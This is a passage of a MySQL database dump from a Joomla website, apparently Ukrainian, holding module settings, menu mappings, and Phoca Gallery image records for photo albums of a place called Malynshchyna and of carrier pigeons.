image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 5\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-5.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 6\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-6.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 7\\\",\\\"img\\\":\\\"\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\"> \\\\n<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"}],\\\"dir\\\":{\\\"path\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/\\\",\\\"ext\\\":\\\".jpg,.png\\\"},\\\"art\\\":{\\\"src\\\":\\\"art\\\",\\\"art\\\":null,\\\"cat\\\":null,\\\"sort\\\":\\\"id\\\",\\\"dir\\\":\\\"asc\\\",\\\"showtitle\\\":\\\"0\\\",\\\"showintro\\\":\\\"0\\\",\\\"intro_chars\\\":\\\"100\\\",\\\"intro_endchar\\\":\\\"\\\",\\\"showreadmore\\\":\\\"0\\\",\\\"readmore_text\\\":\\\"Read More \\u203a\\\"}}\",\"moduleclass_sfx\":\"\",\"layout\":\"_:default\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(174,2864,'новини','','	<p>{PAGE}</p><table></table><p>{PAGE_COUNT}</p>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(182,2884,'Phoca Gallery Image Module(Малинщина)','','',1,'banner1',0,'0000-00-00 00:00:00','2021-01-19 06:26:18','0000-00-00 00:00:00',1,'mod_phocagallery_image',1,0,'{\"category_id\":[\"1\"],\"image_ordering\":\"1\",\"limit_start\":\"0\",\"limit_count\":\"1\",\"module_link\":\"0\",\"module_type\":\"0\",\"image_size\":\"auto\",\"font_color\":\"#b36b00\",\"display_name\":\"1\",\"display_icon_detail\":\"1\",\"display_icon_download\":\"2\",\"font_size_name\":\"12\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"padding_mosaic\":\"3\",\"custom_image_width\":\"\",\"custom_image_height\":\"\",\"minimum_box_width\":\"\",\"phocagallery_module_width\":\"\",\"detail_window\":\"4\",\"modal_box_overlay_color\":\"#000000\",\"modal_box_overlay_opacity\":\"0.3\",\"modal_box_border_color\":\"#6b6b6b\",\"modal_box_border_width\":\"2\",\"sb_slideshow_delay\":\"5\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"highslide_description\":\"1\",\"jak_slideshow_delay\":\"5\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"detail_buttons\":\"1\",\"moduleclass_sfx\":\"\",\"module_css_style\":\"\",\"cache\":\"0\",\"alternative_layout\":\"_:default\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(183,2885,'Phoca Gallery Image Module (поштові голуби)','','',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_phocagallery_image',1,0,'{\"category_id\":[\"3\"],\"image_ordering\":\"1\",\"limit_start\":\"0\",\"limit_count\":\"1\",\"module_link\":\"0\",\"module_type\":\"0\",\"image_size\":\"auto\",\"font_color\":\"#b36b00\",\"display_name\":\"1\",\"display_icon_detail\":\"1\",\"display_icon_download\":\"2\",\"font_size_name\":\"12\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"padding_mosaic\":\"3\",\"custom_image_width\":\"\",\"custom_image_height\":\"\",\"minimum_box_width\":\"\",\"phocagallery_module_width\":\"\",\"detail_window\":\"4\",\"modal_box_overlay_color\":\"#000000\",\"modal_box_overlay_opacity\":\"0.3\",\"modal_box_border_color\":\"#6b6b6b\",\"modal_box_border_width\":\"2\",\"sb_slideshow_delay\":\"5\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"highslide_description\":\"1\",\"jak_slideshow_delay\":\"5\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"detail_buttons\":\"1\",\"moduleclass_sfx\":\"\",\"module_css_style\":\"\",\"cache\":\"0\",\"alternative_layout\":\"_:default\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(184,2888,'Phoca Gallery Image Module (поштові білі голуби) ','','',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_phocagallery_image',1,0,'{\"category_id\":[\"4\"],\"image_ordering\":\"1\",\"limit_start\":\"0\",\"limit_count\":\"1\",\"module_link\":\"0\",\"module_type\":\"0\",\"image_size\":\"auto\",\"font_color\":\"#b36b00\",\"display_name\":\"1\",\"display_icon_detail\":\"1\",\"display_icon_download\":\"2\",\"font_size_name\":\"12\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"padding_mosaic\":\"3\",\"custom_image_width\":\"\",\"custom_image_height\":\"\",\"minimum_box_width\":\"\",\"phocagallery_module_width\":\"\",\"detail_window\":\"4\",\"modal_box_overlay_color\":\"#000000\",\"modal_box_overlay_opacity\":\"0.3\",\"modal_box_border_color\":\"#6b6b6b\",\"modal_box_border_width\":\"2\",\"sb_slideshow_delay\":\"5\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"highslide_description\":\"1\",\"jak_slideshow_delay\":\"5\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"detail_buttons\":\"1\",\"moduleclass_sfx\":\"\",\"module_css_style\":\"\",\"cache\":\"0\",\"alternative_layout\":\"_:default\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(185,2911,'Phoca Gallery Image Module (поштові голуби_грудень 20)','','',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_phocagallery_image',1,0,'{\"category_id\":[\"5\"],\"image_ordering\":\"1\",\"limit_start\":\"0\",\"limit_count\":\"1\",\"module_link\":\"0\",\"module_type\":\"0\",\"image_size\":\"auto\",\"font_color\":\"#b36b00\",\"display_name\":\"1\",\"display_icon_detail\":\"1\",\"display_icon_download\":\"2\",\"font_size_name\":\"12\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"padding_mosaic\":\"3\",\"custom_image_width\":\"\",\"custom_image_height\":\"\",\"minimum_box_width\":\"\",\"phocagallery_module_width\":\"\",\"detail_window\":\"4\",\"modal_box_overlay_color\":\"#000000\",\"modal_box_overlay_opacity\":\"0.3\",\"modal_box_border_color\":\"#6b6b6b\",\"modal_box_border_width\":\"2\",\"sb_slideshow_delay\":\"5\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"highslide_description\":\"1\",\"jak_slideshow_delay\":\"5\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"detail_buttons\":\"1\",\"moduleclass_sfx\":\"\",\"module_css_style\":\"\",\"cache\":\"0\",\"alternative_layout\":\"_:default\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*');
/*!40000 ALTER TABLE `fw3gt_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_modules_menu`
--

DROP TABLE IF EXISTS `fw3gt_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_modules_menu`
--

LOCK TABLES `fw3gt_modules_menu` WRITE;
/*!40000 ALTER TABLE `fw3gt_modules_menu` DISABLE KEYS */;
INSERT INTO `fw3gt_modules_menu` VALUES (1,0),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,0),(17,104),(17,105),(17,108),(17,110),(17,203),(79,0),(86,0),(87,104),(87,203),(87,815),(87,816),(87,817),(87,818),(87,819),(87,820),(87,821),(87,822),(87,823),(101,104),(101,105),(101,108),(101,110),(101,203),(102,104),(102,203),(102,815),(102,816),(102,817),(102,818),(102,819),(102,820),(102,821),(102,822),(102,823),(115,0),(120,104),(120,105),(120,108),(120,110),(120,203),(121,104),(121,105),(121,108),(121,110),(121,203),(126,104),(126,203),(131,104),(131,105),(131,108),(131,110),(131,203),(140,203),(140,823),(142,104),(142,105),(142,108),(142,110),(142,203),(143,104),(143,203),(143,815),(143,816),(143,817),(143,818),(143,819),(143,820),(143,821),(143,822),(143,823),(154,104),(154,105),(154,108),(154,110),(154,203),(158,824),(158,825),(159,825),(163,104),(167,104),(167,203),(169,104),(169,815),(169,816),(169,817),(169,818),(169,819),(169,820),(169,821),(170,104),(170,203),(171,105),(171,110),(172,203),(172,371),(174,0),(182,825),(183,825),(184,825),(185,825);
/*!40000 ALTER TABLE `fw3gt_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_newsfeeds`
--

DROP TABLE IF EXISTS `fw3gt_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `link` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(10) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(10) unsigned NOT NULL DEFAULT '3600',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_newsfeeds`
--

LOCK TABLES `fw3gt_newsfeeds` WRITE;
/*!40000 ALTER TABLE `fw3gt_newsfeeds` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_overrider`
--

DROP TABLE IF EXISTS `fw3gt_overrider`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_overrider` (
  `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `constant` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `string` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `file` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_overrider`
--

LOCK TABLES `fw3gt_overrider` WRITE;
/*!40000 ALTER TABLE `fw3gt_overrider` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_overrider` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_phocagallery`
--

DROP TABLE IF EXISTS `fw3gt_phocagallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_phocagallery` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(250) NOT NULL DEFAULT '',
  `format` tinyint(1) NOT NULL DEFAULT '0',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `userid` int(11) NOT NULL DEFAULT '0',
  `videocode` text,
  `vmproductid` int(11) NOT NULL DEFAULT '0',
  `pcproductid` int(11) NOT NULL DEFAULT '0',
  `imgorigsize` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `extlink1` text,
  `extlink2` text,
  `extid` varchar(255) NOT NULL DEFAULT '',
  `exttype` tinyint(1) NOT NULL DEFAULT '0',
  `extl` varchar(255) NOT NULL DEFAULT '',
  `extm` varchar(255) NOT NULL DEFAULT '',
  `exts` varchar(255) NOT NULL DEFAULT '',
  `exto` varchar(255) NOT NULL DEFAULT '',
  `extw` varchar(255) NOT NULL DEFAULT '',
  `exth` varchar(255) NOT NULL DEFAULT '',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`)
) ENGINE=InnoDB AUTO_INCREMENT=108 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_phocagallery`
--

LOCK TABLES `fw3gt_phocagallery` WRITE;
/*!40000 ALTER TABLE `fw3gt_phocagallery` DISABLE KEYS */;
INSERT INTO `fw3gt_phocagallery` VALUES (35,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000002.jpg',1,NULL,'2020-09-02 12:23:45',51,'0','0',0,'',0,NULL,0,0,66091,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(36,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000003.jpg',1,NULL,'2020-09-02 12:23:45',18,'0','0',0,'',0,NULL,0,0,76970,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(37,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000004.jpg',1,NULL,'2020-09-02 12:23:45',12,'0','0',0,'',0,NULL,0,0,143504,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(38,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000005.jpg',1,NULL,'2020-09-02 12:23:45',12,'0','0',0,'',0,NULL,0,0,159456,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(39,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000006.jpg',1,NULL,'2020-09-02 12:23:45',10,'0','0',0,'',0,NULL,0,0,89618,1,1,0,'0000-00-00 00:00:00',5,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(40,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000007.jpg',1,NULL,'2020-09-02 12:23:45',11,'0','0',0,'',0,NULL,0,0,89618,1,1,0,'0000-00-00 00:00:00',6,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(41,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000008.jpg',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,145148,1,1,0,'0000-00-00 00:00:00',7,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','360,100,50','*'),(42,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000009.JPG',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,153137,1,1,0,'0000-00-00 00:00:00',8,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','428,100,50','*'),(43,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000010.JPG',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,86572,1,1,0,'0000-00-00 00:00:00',9,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(44,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000011.JPG',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,133258,1,1,0,'0000-00-00 00:00:00',10,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(45,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000012.JPG',1,NULL,'2020-09-02 12:23:45',7,'0','0',0,'',0,NULL,0,0,144999,1,1,0,'0000-00-00 00:00:00',11,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(46,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000013.JPG',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,116186,1,1,0,'0000-00-00 00:00:00',12,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(47,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000014.JPG',1,NULL,'2020-09-02 12:23:45',11,'0','0',0,'',0,NULL,0,0,56727,1,1,0,'0000-00-00 00:00:00',13,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(48,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000015.JPG',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,176030,1,1,0,'0000-00-00 00:00:00',14,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(49,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000016.JPG',1,NULL,'2020-09-02 12:23:45',10,'0','0',0,'',0,NULL,0,0,189578,1,1,0,'0000-00-00 00:00:00',15,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(50,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000017.jpg',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,190445,1,1,0,'0000-00-00 00:00:00',16,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(51,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000018.jpg',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,193615,1,1,0,'0000-00-00 00:00:00',17,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(52,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000019.jpg',1,NULL,'2020-09-02 12:23:45',9,'0','0',0,'',0,NULL,0,0,129816,1,1,0,'0000-00-00 00:00:00',18,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(53,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000020.jpg',1,NULL,'2020-09-02 12:23:45',11,'0','0',0,'',0,NULL,0,0,129241,1,1,0,'0000-00-00 00:00:00',19,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(54,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000021.jpg',1,NULL,'2020-09-02 12:23:45',11,'0','0',0,'',0,NULL,0,0,131904,1,1,0,'0000-00-00 00:00:00',20,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(55,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000022.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,135374,1,1,0,'0000-00-00 00:00:00',21,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(56,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000023.jpg',1,NULL,'2020-09-02 12:23:45',7,'0','0',0,'',0,NULL,0,0,126774,1,1,0,'0000-00-00 00:00:00',22,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(57,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000024.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,97163,1,1,0,'0000-00-00 00:00:00',23,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(58,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000025.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,170804,1,1,0,'0000-00-00 00:00:00',24,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(59,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000026.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,160228,1,1,0,'0000-00-00 00:00:00',25,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','411,100,50','*'),(60,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000027.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,132738,1,1,0,'0000-00-00 00:00:00',26,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','635,100,50','480,100,50','*'),(61,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000028.jpg',1,NULL,'2020-09-02 12:23:45',8,'0','0',0,'',0,NULL,0,0,72727,1,1,0,'0000-00-00 00:00:00',27,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','639,100,50','480,100,50','*'),(62,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000029.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,154743,1,1,0,'0000-00-00 00:00:00',28,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','429,100,50','*'),(63,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000030.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,156867,1,1,0,'0000-00-00 00:00:00',29,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','441,100,50','*'),(64,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000031.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,119782,1,1,0,'0000-00-00 00:00:00',30,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','273,100,50','*'),(65,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000032.jpg',1,NULL,'2020-09-02 12:23:45',8,'0','0',0,'',0,NULL,0,0,142258,1,1,0,'0000-00-00 00:00:00',31,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(66,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000033.jpg',1,NULL,'2020-09-02 12:23:45',6,'0','0',0,'',0,NULL,0,0,163280,1,1,0,'0000-00-00 00:00:00',32,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(67,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000034.jpg',1,NULL,'2020-09-02 12:23:45',7,'0','0',0,'',0,NULL,0,0,123194,1,1,0,'0000-00-00 00:00:00',33,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','480,100,50','*'),(68,1,0,'Малинщина','malynshchyna','fotogaleri/malyn_nash000035.jpg',1,NULL,'2020-09-02 12:23:45',7,'0','0',0,'',0,NULL,0,0,56971,1,1,0,'0000-00-00 00:00:00',34,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','640,100,50','254,100,50','*'),(70,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00093.jpg',1,'			','2020-09-03 00:00:00',43,'0','0',0,'',0,'',0,0,101190,1,1,0,'0000-00-00 00:00:00',2,NULL,'','',NULL,'||_self|1','||_self|1','',0,'','','','','','','*'),(71,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00062.jpg',1,NULL,'2020-09-03 17:03:27',21,'0','0',0,'',0,NULL,0,0,216436,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,NULL,'',0,'','','','','','','*'),(72,3,0,'Поштові','poshtovi','fotogaleri_golub/gpost_20200903_00063.jpg',1,NULL,'2020-09-03 17:03:27',11,'0','0',0,'',0,NULL,0,0,211303,1,1,0,'0000-00-00 